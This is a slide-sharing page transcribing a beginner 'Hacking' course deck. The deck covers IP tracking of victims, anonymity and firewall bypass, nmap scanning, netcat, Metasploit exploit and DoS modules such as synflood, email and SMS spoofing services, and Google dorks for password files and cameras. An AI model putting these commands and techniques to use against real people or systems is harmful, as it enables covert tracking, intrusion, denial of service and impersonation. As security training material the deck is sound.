adhoc network workshop
Ali Nezhad
 
Basic networking concept1
Basic networking concept1Basic networking concept1
Basic networking concept1
reddydivakara
 

Similar a Hacking (20)

Ip addressing upload
Ip addressing uploadIp addressing upload
Ip addressing upload
 
Cyber security and ethical hacking 3
Cyber security and ethical hacking 3Cyber security and ethical hacking 3
Cyber security and ethical hacking 3
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Ip address
Ip addressIp address
Ip address
 
IBPS SO
IBPS SOIBPS SO
IBPS SO
 
adhoc network workshop
adhoc network workshopadhoc network workshop
adhoc network workshop
 
Ip address and subnet masking final
Ip address and subnet masking finalIp address and subnet masking final
Ip address and subnet masking final
 
Konsep pembangunan tapak web & laman web
Konsep pembangunan tapak web & laman webKonsep pembangunan tapak web & laman web
Konsep pembangunan tapak web & laman web
 
Understanding computer networks
Understanding computer networksUnderstanding computer networks
Understanding computer networks
 
Lecture5_IP_NAT.ppt
Lecture5_IP_NAT.pptLecture5_IP_NAT.ppt
Lecture5_IP_NAT.ppt
 
Lecture5_IP_NAT.ppt
Lecture5_IP_NAT.pptLecture5_IP_NAT.ppt
Lecture5_IP_NAT.ppt
 
Lecture5_IP_NAT.ppt
Lecture5_IP_NAT.pptLecture5_IP_NAT.ppt
Lecture5_IP_NAT.ppt
 
News bytes Sept-2011
News bytes Sept-2011News bytes Sept-2011
News bytes Sept-2011
 
Ip addresses
Ip addressesIp addresses
Ip addresses
 
Digital network lecturer2
Digital network lecturer2Digital network lecturer2
Digital network lecturer2
 
ffuyu yguyguyg.pptx
ffuyu yguyguyg.pptxffuyu yguyguyg.pptx
ffuyu yguyguyg.pptx
 
Hyperlink
HyperlinkHyperlink
Hyperlink
 
Ip address
Ip addressIp address
Ip address
 
Asas Pelayaran Internet
Asas Pelayaran InternetAsas Pelayaran Internet
Asas Pelayaran Internet
 
Basic networking concept1
Basic networking concept1Basic networking concept1
Basic networking concept1
 

Hacking

  • 1. is a hacker ? A Hacker is NOT a criminal A hacker is Somebody who thinks outside the box. Wants to test his limits Wants to try things that are not in the manual Has unlimited curiosity Discovers unknown features about technology Dedicated to knowledge Beleives in stretching the limits Highly creative Hackers vs. Crackers Hackers Crackers Very knowledgeable Good guy Bad guy Help improve security Want to cause cyber destruction Strong ethics No ethics Have prior permission No prior permission Job opportunities: Banking, Telecom, IT/IteS/BPO/KPOs, ecommerce, military, police, retail industry, etc. Hacking into a computer is just like breaking into a house. Steps of a hacker: 1. Identify the victimInformation Gathering 2. Find a loophole/network reconnaissance 3. Actual attack/hack/break in 4. Escape without a trace Identify the victim:- Anatomy of an IP address:- An IP address is something anologous to your mobile phone number. It is something which uniquely identifies your presence on the internet. It is a 32-bit address which is divided into four fields of 8-bit each containing numbers betwen 1 and 255. By simply studying an IP address, we can easily reveal a lot of information about the network the victim belongs to. Different classes of an IP address Class Range Network/Host IDs A 0.0.0.0 to 126.255.255.255 NETWORK.HOST.HOST.HOST B 128.0.0.0 to NETWORK.NETWORK.HOST.HOST 191.255.255.255 C 192.0.0.0 to NETWORK.NETWORK.NETWORK.HOST 223.255.255.255 D 224.0.0.0 to Multicast IP addresses. They are IP addresses set 239.255.255.255 aside for special purposes E 240.0.0.0 to Not in use 255.255.255.255 XX.YY.AA.BB network ID host ID Class A: XXX YY.AA.BB
  • 2. Class B: XXX.YY AA.BB Class C: XX.YY.AA BB Special IP addresses: Use IP address Local loopback address 127.0.0.1 Private IP Address: to be used for computers Class A Network inside a private network or LAN 10.0.0.0 – 10.255.255.255 Class B Network 172.16.0.0 – 172.31.255.255 Class C Network 192.168.0.0 – 192.168.255.255 Converting IP addresses into different formats: Format IP Address Decimal 171.67.215.200 Binary 10101011.01000011.11010111.1001000 Octal 253.103.327.310 Hexadecimal 00AB.0043.00D7.00C8 http://www.csgnetwork.com/ipaddconv.html Windows Scientific calculator Tracking victim IP address www.spypig.com – use to find out the IP address of the victim via sending a tracking image to victim„s email id. http://www.getnotify.com/ http://didtheyreadit.com/ http://www.politemail.com/ - commonly used in corporate world http://readnotify.com/ - creates tracking file like a word or pdf file. How to trace an email back to its sender ? 1st technique:- Step 1: Open email headers (Show original option in gmail. In yahoo. Email settings->full headers) Step 2: Analyze email headers Manually (the headers contain IP address) or automatically (2nd technique)using emailtrackerpro (http://www.emailtrackerpro.com/) 3rd technique:- http://blasze.com/iplog/ Simply send a crafted link to your friend Now we have ORIGINAL URL and VICTIM URL DISGUISED URL: using URL shortening website s www.bit.ly www.goo.gl 4th technique: www.whatismyipaddress.com How to find out victim„s IP address using a website ? Step 1: create your own website/webpage/blog Step 2: in the homepage, write a java code to extract IP address and MAC address of victim Step 3: Invite the victim(s) 5th technique: Using chatting software (not a reliable technique though) Setup a chat with victim and put the below command in dos prompt- netstat –n 6th technique:- TCPView Software http://technet.microsoft.com/en- us/sysinternals/bb897437.aspx Currports http://www.nirsoft.net/utils/cports.html
  • 3. How to trace an IP address to exact geographical location ? http://visualroute.visualware.com/ NeoTrace pro http://neotrace-pro.en.softonic.com/ 3d traceroute http://www.d3tr.de/ loriot pro http://www.loriotpro.com/ geospider http://oreware.com/viewprogram.php?prog=22 http://vtrace.pl/ All are online versions of the simple traceroute command Ex: tracert www.indiatimes.com Trace a mobile phone number to its geographical location http://trace.bharatiyamobile.com/ Tracking stolen smartphone https://www.lookout.com/ create a lookout account and register your device. Summary - What to do to be a hacker - What is IP address - How to get somebody„s IP address - How to trace the IP address„s exact geographic location - How to track a mobile phone - How to trace a lost smartphone Internal and External IP addresses Introduction to NAT (Network Address Translation) When the internet was initially created, there was no shortage of any IP addresses. However, as internet usage spread, an acute shortage of IP addresses was created worldwide This led to emergence of Network Address Translation. Advantages of NAT are- It Reduces need for IP addresses, Improves security and Easier implementation of networks In a NAT system, nobody from outside world will know IP address of an internal system. - Identity is protected - No direct connection
  • 4. In a NAT enabled system, a person from outside, first have to hack into the router before trying to get into the internal system. Depending upon the entension number entered, the lookup table is used to route the call to the appropriate internal system. How to find out internal IP address & external IP address ? Internal IP address can be found using netstat –n ipconfig /all External IP address can be found on http://whatismyipaddress.com/ How to hide your IP address ? by using a proxy server http://www.anonymizer.ru – online tool/web proxy Most of the russian proxy websites are free None of them maintain any record or log files http://samair.ru/proxy/ http://www.hidemyass.com/ - uses URL encoding so that ”facebook” does not appear on URL Torrents:- How torrents are blocked ? - Disabling torrent clients Solution- http://www.bitlet.org/ - Block download of .torrent extension files Solution- http://www.torrent2exe.com/ http://txtor.dwerg.net/ The perfect cyber crimes are commited by effectively hiding your presence on the internet. Your presence on the internet can be spoofed or tricked by hiding your IP address as well as by hiding your system„s MAC address plus with a lethal technique called war driving. Difference between IP address and MAC address IP address MAC address Given by ISP/Network Given by manufacturer and it is static 2 types- static IP address and dynamic IP Your hardware Network Interface Card (NIC) address like ethernet card, wifi card, bluetooth, etc has its unique MAC address DOS command to get your internal IP DOS command to get their respective MAC address is– addresses is Ipconfig /all getmac To get your external IP address, open your web browser and goto http://whatismyipaddress.com/ The perfect cyber crimes are commited by- Proxy bouncing – IP hiding or IP spoofing (Ultrasoft) MAC spoofing – (MACAddressChanger, MacMakeUp-doesnt work on windows XP, MadMacs, EtherChange, BWmachak) War driving – driving on the streets with a laptop and scan for unprotected Wifi networks (inssider, Netstumbler, Kismet, Airsnort and War Chalking) Onion routing protocol – provides anonymous, secure, encrypted access to the internet. Ex- TOR
  • 5. How TOR is better than proxy servers ? TOR is available as free download from http://www.torproject.org.in/ How to unblock TOR ? - Change the name of the downloaded TOR exe file - In the TOR„s proxy settings, change the default port number - Add bridge relay server URLs to TOR from https://bridges.torproject.org/ Bridge relays (or "bridges" for short) are Tor relays that aren't listed in the main directory. Since there is no complete public list of them, even if your ISP is filtering connections to all the known Tor relays, they probably won't be able to block all the bridges. Incase https://bridges.torproject.org/ is blocked, another way to find public bridge addresses is to send mail to bridges@torproject.org with the line "get bridges" by itself in the body of the mail. However, so we can make it harder for an attacker to learn lots of bridge addresses, you must send this request from an email address at one of the following domains: gmail.com yahoo.com Types of Proxy servers – SOCKS and HTTP HTTP proxy servers – allow you to bypass filtering mechanisms and access blocked content. User sends HTTP request to proxy server, who then reads the Host header in the HTTP request, connects to the target server and transmits back whatever data the server sends back. Usually, it works only with HTTP apps. Ex:- anonymizer.com SOCKS proxy servers allows you to bypass filtering mechanisms and access blocked content. SOCKS is a protocol that transmits data between source and destination cia a proxy server without reading any of the contents. Hence it works with all protocols like TCP, UDP, etc. And will allow you to use all applications (like mail, browsing, downloading files, etc.) . Ex- TOR TOR works on port number 9051. Using TOR, you can hide yourself in skype or any other instant messenger, There are 2 ways to do this- - Connect the application to TOR - Connect the application to a proxy
  • 6. - Both cases requires an IP address and port number. Goto skype tools options connection settings  proxy Give proxy IP as 127.0.0.1 and port number 9051. Tools:- Multiproxy (http://multiproxy.org/multiproxy.htm) – allows you to keep proxies all in the same session. It supports both HTTP and SOCKS. You just need to feed this software with the proxy servers. SOCKSCHAIN http://ufasoft.com/socks/ Connects you to a chain of SOCKS or HTTP proxies (Proxy bond) ProxyFire http://www.proxyfire.net/ Ultrasurf https://ultrasurf.us/ - Anonumous browsing from your pendrive. It encrypts connection, hides your IP and unblocks stuff. You can even configure a proxy inside ultrasurf if your college/organization requires a proxy server to connect to. Virtual Private Network (VPN) A VPN is a group of computers connected privately through a public network like Internet. Usually VPN services gives you an encrypted, secure and anonymous communication channel. Popular VPN services are:- HideMyAss, IPVanish, StrongVPN, BoxVPN, 12VPN and GoTrusted. VPN is like a proxy but in a private network. If Ultrasulf/SOCKS or proxy services doesn„t work as expected, a VPN service is used. VPN servers, like proxy servers can be in different parts of the world. Theseservers provide better spped than proxy servers VPNs are used to access blocked videos in Internet. Ex:- http://www.hidemyass.com/vpn/ HTTP Tunneling Assume that inside your network, FTP, some websites/torrents are blocked by your firewall. But no firewall blocks all traffic. HTTP tunneling disguises blocked sites as regular/allowed http traffic. Let us assume that in your college/company, FTP protocol (port 21) is blocked or torrents are blocked. The firewall only allows HTTP traffic on port 80, all other ports are blocked. It is possible to encapsulate FTP or torrent traffic inside HTTP protocol and bypass the firewall. Step 1:- Install HTTP tunneling software server on your home or outside computer that has unrestricted access. Step 2:- Install HTTPTunneling software client on your college/office computer that has restricted access. Step 3:- Now your connection diagram is as follows YOU FTP or torrent software HTTP Tunneling client  sends FTP or torrent traffic encapsulated into HTTP protocol via port 80 to bypass firewall  HTTP Tunneling server on Home Computer  FTP or Torrent Destination
  • 7. Now you can use college computer to access everything on your home network including unrestricted internet. Ex:- Tunnelizer, HTTPort and HTTPTunnel are good HTTPTunneling tools. Super Network Tunnel (http://www.networktunnel.net/) is a commercial tool to perform 2 way HTTP Tunneling Home networkcollege network Some cool stuffs:- PSIPHON (http://psiphon.ca/) Proxy workbench (http://proxyworkbench.com/) Reverse text:- http://www.textmechanic.com/ Upside down text (http://www.upsidedowntext.com/) Proxy Workbench (http://proxyworkbench.com/) People Hacking:- Whatever we do online are tracked in some website. http://www.pipl.com/ http://www.spokeo.com/ http://www.anywho.com/ http://www.intelius.com/ google maps street view google earth satellite view Network reconnaissance and Information gathering 2nd step to hacking Network reconnaissance is the process of finding out as much information about victim as possible. Typically an attacker is trying to find out the following about the victim- - Victim is online/offline - Network topography - DNS information - List of open ports - DNS information - Names and versions of software running open ports - OS details - Possible security loopholes Techniques:- PING sweeping, Traceroute DNS related tools LAN surveyors Port scanning Daemon Banner Grabbing OS fingerprinting Security Auditing
  • 8. How to execute the attack Ping sweeping Ping is used to check the connectivity between your computer and the remote computer (whether you are online, whether victim is online and whether there is connectivity between both of you) Ping is used for Denial of Service (DoS) attacks, OS and firewall detection purposes. Popular sweeping tools are nmap (http://nmap.org/) http://ping.eu/ Ping using Nmap:- nmap –sn –v www.google.com (-sn means No port scan) Ping by bypassing firewall nmap –sn –v –Pn www.google.com Instead of using ICMP echo requests, it connects to port 80 -sn === perform ping. -v == verbose mode (gives you detailed information about what it is doing) ICMP echo requests/replies can easily be blocked by a firewall. Hence, -Pn option attempts to connect to the website or port 80 of www.google.com Ping sweeping allows you to ping entire range of computers nmap –sn –v 203.94.1.0-255 Angry IP scanner – ping sweeping tool Traceroute When data packets travel from source to destination system, then they do not always take the same path, Traceroute is a tool that allows you to trace a path between two systems. Originally it was designed for network troubleshooting but commonly used for - OS detection - Firewall detection - Network topology information - Geographical location of the target system How to guess the Operating system running on a remote computer by simply using PING and TRACEROUTE ? Time to live (TTL) is a mechanism that limits the lifespan or lifetime of data in a computer or network. TTL value gets reduced by one everytime data packet reaches a router. The initial TTL value is determined by the operating system. If I am able to find out the initial TTL value of a data packet sent by the victim, I can guess the operating system running on the victim Different Operating systems have different TTL values. Final TTL value = Initial TTL value-No. of routers Steps to know what OS www.altoromutual.com is running (it is legal to hack this URL) Step 1:- E:Documents and SettingsSYS>ping www.altoromutual.com Pinging altoromutual.com [65.61.137.117] with 32 bytes of data: Reply from 65.61.137.117: bytes=32 time=290ms TTL=117 Reply from 65.61.137.117: bytes=32 time=290ms TTL=117 Reply from 65.61.137.117: bytes=32 time=289ms TTL=117 Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
  • 9. Ping statistics for 65.61.137.117: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 289ms, Maximum = 290ms, Average = 289ms Inference:- Final TTL value = 117 117 = Initial TTL value – No. of router hops Step 2:- E:Documents and SettingsSYS>tracert www.altoromutual.com Tracing route to altoromutual.com [65.61.137.117] over a maximum of 30 hops: 1 <1 ms <1 ms <1 ms 192.168.1.1 2 22 ms 23 ms 25 ms ABTS-KK-Static-001.228.178.122.airtelbroadband.i n [122.178.228.1] 3 20 ms 21 ms 21 ms ABTS-KK-Static-217.32.166.122.airtelbroadband.in [122.166.32.217] 4 20 ms 21 ms 21 ms AES-Static-025.102.22.125.airtel.in [125.22.102. 25] 5 185 ms 178 ms 176 ms 125.62.187.189 6 177 ms 178 ms 178 ms ldn-b2-link.telia.net [213.248.71.17] 7 177 ms 178 ms 178 ms ldn-bb2-link.telia.net [80.91.247.26] 8 290 ms 291 ms 291 ms nyk-bb2-link.telia.net [80.91.248.254] 9 * * * Request timed out. 10 * 290 ms 288 ms rackspace-ic-127247-dls-bb1.c.telia.net [213.248 .88.174] 11 290 ms 289 ms 291 ms coreb.dfw1.rackspace.net [74.205.108.52] 12 291 ms 291 ms 291 ms core5.dfw1.rackspace.net [74.205.108.27] 13 290 ms 294 ms 289 ms 67.192.56.19 14 291 ms 289 ms 289 ms 65.61.137.117 Trace complete. E:Documents and SettingsSYS> Inference:- Count the number of hops. Eliminate 1st entry (which is source) and last entry (which is destination) and do not count request timeouts. = 11 router hops Final TTL value = 113 No. of router hops = 11 117 = Initial TTL value – 11 Initial TTL value = 128 Step 3:- Now google search for default TTL values of different Operating Systems. From the URL, http://www.binbert.com/blog/2009/12/default-time-to-live-ttl-values/ TTL value 128 corresponds to some windows based operating system running on victim (www.altoromutual.com) Domain Name Server A DNS lookup is a query sent by a user (browser or IM or email client) to a DNS server to convert a particular domain name to its respective IP address. www.whois.net www.iptools.com www.betterwhois.com
  • 10. www.dnsstuff.com www.dnstools.com www.zoneedit.com/lookup.html Port Scanning:- Port scanning is the art of scanning a remote target system to obtain a list of open virtual ports on it that are listening for connections. This is usually one of the first few steps every criminal takes. Popular port scanning tools: nmap, strobe, superscan, etc. It allows a criminal to identify any potential entry points into a target computer. The followind covers how to see open ports on some remote computer. Popular Ports:- 21 FTP 23 Telnet 25 SMTP 53 DNS 80 HTTP 110 POP3 443 SSL/https 513 rlogin TCP Packet format:- Flag Types – SYN == Start a new connection FIN == End a connection existing RST == Error Notification ACK == Data Received Successfully How are connections established on the Internet ? 3 Step/3 Way TCP/IP Handshake (===== > meaning sends) Step 1: Client (me)===== > SYN Packet ====== > Host (Google) Step 2: Host ======== >SYN/ACK Packet====== > Client Step 3: Client ======= > ACK Packer ==== > Host Hoe are connections terminated ? 2 steps:-
  • 11. Step 1: Client === > FIN Packet ===== > Host Step 2: Host == > ACK Packet ===== > Client (Reverse also needs to happen) It is possible to create your own packets using colasoft packet builder (Packet Generator) and Komadia Packet Crafter which is available as free download on the internet. TCP CONNECT Port Scan/ TCP Handshake Port Scan:- Port scan establishes a full 3-way TCP/IP Handshake with all ports on the remote system. Procedure:- ATTACKER sends SYN Packet to TARGET OPEN:- TARGET sends back a SYN/ACK Packet CLOSED:- TARGET sends back a RST/ACK Packet ATTACKER sends ACK/RST Packet back to TARGET Advantages:- Very accurate, no countermeasures Disadvantages:- Attacker is Easily Detected/caught Nmap command:- nmap –sT –p1 – 100 –Pn www.altoromutual.com -sT TCP Connect Port Scan -p Port Range Second type of scan where detection is difficult is 1) TCP SYN Port Scan/Half Open Scan/Stealth Scan. Also known as Half Open scan because only half of the complete 3-way TCP/IP handshake is executed. ATTACKER sends SYN Packet to TARGET OPEN: TARGET sends back a SYN/ACK Packet No Third Step (Unlike previous scan). Considered stealth. Can be detected using PortSentry on Unix platform (http://sourceforge.net/projects/sentrytools/) nmap –sF –p1-100 –Pn www.altoromutual.com NULL/XMAS Port Scan – Stealth but unreliable and varied responses nmap –sX –p1-100 www.altoromutual.com (all flags set as 1) nmap –sN –p1-100 www.altoromutual.com (all flags set as 0) 2) IDLE Port Scan (Blind Port Scanning): Very useful for attacker It port scans the victim without sending even a single packet to the victim from own IP address. Every system has fragment ID number which is a 4 digit number that is increased by 1 each time a packet is sent by it. Step 1: Probe a zombie machine for their fragment ID. ATTACKER ===== > sends SYN/ACK packet ======= > ZOMBIE ZOMBIE ======= > sends back a RST packet with Fragment ID ==== > ATTACKER Assume recorded fragment ID = 1012. Step 2: Send spoofed SYN Packet from zombie to victim OPEN: Victim sends SYN/ACK to Zombie. Zombie sends back a RST and increased its fragment ID by 1 and becomes 1013. CLOSED: Victim sends RST to Zombie who discards RST packet and does not change its fragment ID.
  • 12. Step 3: Probe the fragment ID of Zombie again. If fragment ID increased by 1, then port on victim is open, else it is closed. nmap –Pn –p 1-100 –sI <ZOMBIE/Friend‟s IP address> www.altoromutual.com -sI == > idle port scan 3) ACK Port Scan/Firewall detection scan Nmap –sA –pN –p 1-100 www.altoromutual.com This type of scan can be used to determine presence of a firewall filtering out data packets. ATTACKER sends ACK packet to TARGET FIREWALL PRESENT: No response FIREWALL NOT PRESENT: Target sends back RST Packet. Other command line port scanning tool: scanline, hping3, etc. Countermeasures: - Foolproof countermeasures against port scanning do not exist. - Close as many ports as possible. - Filter out certain packets using firewalls, ACLs and other filters using tools like Scanlogd, BlackICE, Abacus, Portsentry, snort, etc. Daemon Banner Grabbing It helps you confirm your guess about the victim Operating System. Once you get to know list of installed software on victim system, the attacker google searches for installed software vulnerabilities. Daemon banner grabbing: It is the process of getting useful information about the target system by recording the welcome banners of the daemons running on various ports. It can be used to get the following information about the target system o Daemon name and version number o OS information o Most important, to identify possible points of entry nmap –sV –p 1-100 www.altoromutual.com Scanline:- sl –v –bt 1-100 www.altoromutual.com Manual technique using Putty (Telnet client) Telnet to port 80 of victim Close window on exit option should be set as never Type HEAD/HTTP/1.0 and press enter. You will get the victim‟s daemon banner as output. HTTPRecon http://www.computec.ch/projekte/httprecon/ Countermeasures: Edit default daemon message ensuring critical information is not revealed. Misguide attacker by displaying dales daemon banners. Use a long false daemon banner and in the background record information about the attacking client and try to trace him/her.
  • 13. NetCat Netcat is one of the most popular and widely used networking utilities on the internet. It can be used to read and write network connections. It is widely used by both criminals and system administrators. Netcat is used for- - Listening to a port - Connecting to a port - File transfer - Chatting - Executing applications - Sending spoofed HTTP probes - Proxy servers - Port scanning, etc. It is also used to probe a remote computer for open ports and daemon/software running on the open ports. Netcat commands (command line tool): nc –v www.altoromutual.com 80 HTTP/1.0 Ncat is improved, better version, which comes free with Nmap. ncat –C www.altoromutual.com 80 get http/1.0 ncat –l 127.0.0.1 8080 opens a port on local machine. Open browser and type 127.0.0.1:8080/ Nothing happens in the browser. In the command prompt, ncat managed to record some information about browser. This technique can be used to trace attackers. Transferring files using ncat: ncat –l 7000 > output.txt (opens port 7000 and accepts input on it, which will be saved in output.txt) Ncat 127.0.0.1 7000 <input.txt Operating System (OS) Detection It is important for an attacker to determine what OS is running on the target system. 2 most effective techniques are- Active Fingerprinting Passive Fingerprinting Different OS have different stacks. Hence, different OS responds differently to the same packet sent to it by same system. This difference in response is used as a benchmark of differentiating between various operating systems. Active Fingerprinting: is the process of actively sending data packets to the target system to generate a response, which is then analyzed and compared to the list of
  • 14. known responses to determine the OS running on the target system. Typically while analyzing responses, the following fields & techniques can be useful- TCP Initial Window Size of packets TTL values ACK Values of packets Initial Sequence Number (ISN) values Handling of overlapped fragments, etc The attacker can be traced. That means this method is not anonymous. Nmap commands:- nmap –O –v www.altoromutual.com nmap –A –v www.altoromutual.com Passive Fingerprinting Problem with active fingerprinting is that it reveals the identity of the criminal http://lcamtuf.coredump.cx/p0f3/ P0f will try to determine the OS information by simply analyzing the data packets sent by the target system while performing usual and routine communication like if target visits your website, sends you a file, etc. p0f –L . p0f –i 4 (interface number) TTL, window size, DF Bit and TOS fields in the reply TCP packet is analyzed to get remote OS. OS Detection Countermeasures Change the default values of your OS like TTL, ISN, etc. Mislead attacker by configuring default values of some other OS on your system. Use ACLs to filter out unwanted probing packets. Security Auditing It is a technique of scanning the victim computer for any potential security loopholes that may exist on it, using which an attacker can hack into it. Tools: Nessus, GFI Languard, Retina Scan, SAINT, Core Impact, NSAuditor (Not Free) Attacking target computer using METASPLOIT In my previous blog, I have covered detailed step by step instructions on how to collect maximum information about victim in pursuit of getting any possible weak entry points. It is popularly called Vulnerabilities. Once you get any possible loopholes or vulnerabilities, it is the perfect time to ATTACK!!! Metasploit is an open source framework for penetration testing that allows you to test the security of a network. It had a built in large database of hundreds of known
  • 15. loopholes and vulnerabilities for various platforms and software. It allows you to automatically test a remote system for all these hundreds of security loopholes. EXPLOIT: is a code, software or tool that misuses a vulnerability or loophole on a remote machine to cause malicious results on it. PAYLOAD: is defined as the effect of executing the exploit code and some other payload code on a remote machine, which allows a medium of communication to be established between the attacker and the victim. It could be in the form of modification/deletion of data, getting shell access, file access and others. Each EXPLOIT will support certain type of PAYLOADS. STEPS INVOLVED 1. Identify loophole on victim using network reconnaissance, security auditing and penetration testing. 2. Select and configure that exploit and various exploit options on metasploit. 3. Select victim computer and victim port. 4. Select payload you wish to launch with exploit code. 5. Launch the attack. Metasploit Commands: >help >banner >connect www.altoromutual.com 80 Get /HTTP/1.0 >ping www.altoromutual.com >show exploits >show payloads >show auxiliary >search type:exploit platform: windows unsafe >info windows/tftp/quick_tftp_pro_mode >use windows/tftp/quick_tftp_pro_mode windows/tftp/quick_tftp_pro_mode>show options windows/tftp/quick_tftp_pro_mode>set RHOST altoromutual.com windows/tftp/quick_tftp_pro_mode>check windows/tftp/quick_tftp_pro_mode>exploit windows/tftp/quick_tftp_pro_mode>back (exit a module) Port scanning using Metasploit It is possible to port scan a remote computer using metasploit. All nmap commands are valid in metasploit. >search portscan >use auxiliary/scanner/portscan/tcp >use auxiliary/scanner/portscan/syn (SYN port scan) >use auxiliary/scanner/portscan/xmas (XMAS port scan) >use auxiliary/scanner/portscan/ack (ACK port scan) >show options >set RHOSTS www.victim.com >set RPORTS 1-100 >set verbose true >run
  • 16. >nmap –sT –p 1-100 –Pn www.victim.com Daemon Banner Grabbing using metasploit >use auxiliary/scanner/pop3/pop3_version >set RHOSTS www.victim.com >run Similarly, >use auxiliary/scanner/pop3/http_version >set RHOSTS www.victim.com >run >use auxiliary/scanner/pop3/smtp_version >set RHOSTS www.victim.com >run (SMTP runs on port 25, port 80 is HTTP and port 110 is POP3) Grabbing Email Addresses from a website >search collector >use auxiliary/gather/search_mail_collector >show options >set domain www.victim.com >run TCP flooding using metasploit It is possible to execute a DOS attack against various victims using metasploit >use auxiliary/dos/tcp/synflood >set RHOST www.victim.com >run FileZilla is a popular FTP server based on windows platform. There are 2 exploit modules in metasploit that can be used to execute a DOS attack against some versions of the FileZilla server >use auxiliary/dos/windows/ftp/filezilla_admin_user >set RHOST www.victim.com >run >use auxiliary/dos/windows/ftp/filezilla_server_port >set RHOST www.victim.com >run Disposable email (anonymous): www.hidemyass.com. Email Spoofing: is the art of sending a spoofed email from somebody else‟s email account. www.anonymizer.in/fake-mailer SMS Spoofing: (Paid service but may be worth) http://www.spranked.com/ http://www.phonytext.com/ Call Spoofing: http://www.mobivox.com
  • 17. Google Dorks Google Hacking or Google Dorking is the use of clever google search tags or commands to try and reveal sensitive data about victims like password files, vulnerable servers and others. A google dork, according to a hacker slang is somebody whose sensitive data is revealed with the use of Google Hacking or Google Dorking. Examples: info:<web address> cache:www.facebook.com password (retrieve old cached copy of webpage) link:www.flyingmachine.co.in allintitle:Login allintitle:Login+site:timesofindia.com allinurl:password login allinurl:password login+site:www.google.com inurl:/view.index.shtml (access live cameras) inurl:/view.indexFrame.shtml Axis ext:pdf hacking site:gov inurl:admin login site:in inurl:admin login intitle:intranet inurl:intranet+site:in “Welcome to phpMyAdmin” AND “Create new database” “index of /etc/passwd” Google Hacking Database (GHDB) http://www.hackersforcharity.org/ghdb/ Website Mirroring